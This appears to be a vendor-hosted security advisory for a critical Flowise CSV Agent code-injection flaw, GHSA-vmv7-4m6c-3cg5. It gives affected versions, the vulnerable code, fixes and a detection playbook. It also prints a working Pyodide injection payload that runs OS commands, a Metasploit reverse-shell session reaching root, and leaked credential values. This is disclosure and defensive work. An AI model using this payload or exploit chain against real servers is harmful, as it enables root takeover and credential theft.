GHSA-vmv7-4m6c-3cg5 — flowise
Fix: FlowiseAI/Flowise#6499GHSA-vmv7-4m6c-3cg5 is a Code Injection vulnerability in flowise. A fix is available for flowise — see the affected versions and patch details below.
Flowise: CSV Agent Remote Code Execution via Pyodide Code Injection — Root Shell Verified
Exploitation Status
Proof-of-concept exploit code exists
- CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.
- A successful exploit gives an attacker total control of the affected component, not partial access.
Exploitation and automatability from CISA’s SSVC triage for GHSA-vmv7-4m6c-3cg5.
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Real-World Exposure
How broadly this vulnerability is actually deployed: weekly install volume shows current usage, and reverse-dependency count shows how many other packages break if it stays unpatched.
flowisenpmflowise-componentsnpmDescription
UPDATE 2026-05-20: Full RCE as root VERIFIED
This is not theoretical — a Meterpreter reverse shell session as root has been established on Flowise 3.1.2.
Verified Exploit Chain
- Python code injection via
base64_string = "${base64String}"(CSVAgent.ts line 161) - Pyodide
jsbridge provides access to the host Node.js process process.mainModule.constructor._load('child_process')loads child_process (bypasses ESM require restriction).execSync('CMD')executes arbitrary OS commands as root (PID 1 in container)
Working RCE Payload
";import js;e=js.globalThis.eval;e("process.mainModule.constructor._load('child_process').execSync('id')");#
Constraint: No commas allowed in payload — csvFile.split(',') splits on all commas.
Metasploit Session Proof
msf > use exploit/multi/http/flowise_csv_agent_rce
msf > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
msf > exploit
[+] Authentication successful
[+] Created chatflow: b6716feb-63c8-4fd2-993f-cd43788704b4
[*] Sending stage (3090404 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:41422)
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : cbce3fb352b7
OS : Linux 6.8.0-111-generic
Architecture : x64
Meterpreter : x64/linux
meterpreter > shell
# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
# uname -a
Linux cbce3fb352b7 6.8.0-111-generic x86_64 Linux
Additional Verified Impact
Credential Theft:
FLOWISE_PASSWORD=admin123
DATABASE_PATH=/root/.flowise
APIKEY_PATH=...
Arbitrary File Read via process.binding('fs').readFileUtf8('/etc/hostname') → cbce3fb352b7
Server DoS — certain native binding calls (spawn_sync) crash the Node.js process entirely.
CVSS v3.1: 9.9 CRITICAL
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Original Report (below)
Vulnerable Code
File: packages/components/nodes/agents/CSVAgent/CSVAgent.ts
Lines 133-138 — Unsanitized string extraction from data URI via file.split(',').pop().pop() — no validation on content.
Lines 155-171 — Direct interpolation into executable Python code:
base64_string = "${base64String}" is inserted into a Python string literal via JS template literal. If the string contains a closing double-quote followed by Python code, it breaks out of the string context.
validatePythonCodeForDataFrame() denylist is only applied to LLM-generated code at line 198, NOT to this initial code block at line 171.
Remediation
Option 1 (Best): Use pyodide.globals.set('base64_string', base64String) instead of string interpolation
Option 2: Validate base64 before interpolation — reject if not matching /^[A-Za-z0-9+/=]*$/
Option 3: Escape special characters (", \n, \r, \\) before interpolation
Related CVEs
- CVE-2026-41264 (CSV Agent regex bypass)
- CVE-2026-41265 (Airtable Agent sandbox bypass)
- CVE-2026-46442 (NodeVM sandbox escape)
Disclosure: Identified with AI assistance (Claude Code). Analysis, verification, and Metasploit module by S9S Bounty-LAB / Kamal Sentassi.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 📦npm | flowise | all versions | 3.1.3npm install flowise@3.1.3 |
| 📦npm | flowise-components | all versions | 3.1.3npm install flowise-components@3.1.3 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for flowise, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.
Fix
Update flowise to 3.1.3 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-vmv7-4m6c-3cg5 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 Security's impact-aware SCA analyses which vulnerable code paths your application actually calls, so a match like GHSA-vmv7-4m6c-3cg5 can be triaged on real exposure rather than presence alone.
Tailored to GHSA-vmv7-4m6c-3cg5. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-vmv7-4m6c-3cg5 in your dependencies?
O3 Security finds GHSA-vmv7-4m6c-3cg5 across npm dependencies, including transitive ones, and its impact-aware SCA ranks findings by whether your code actually calls the vulnerable path.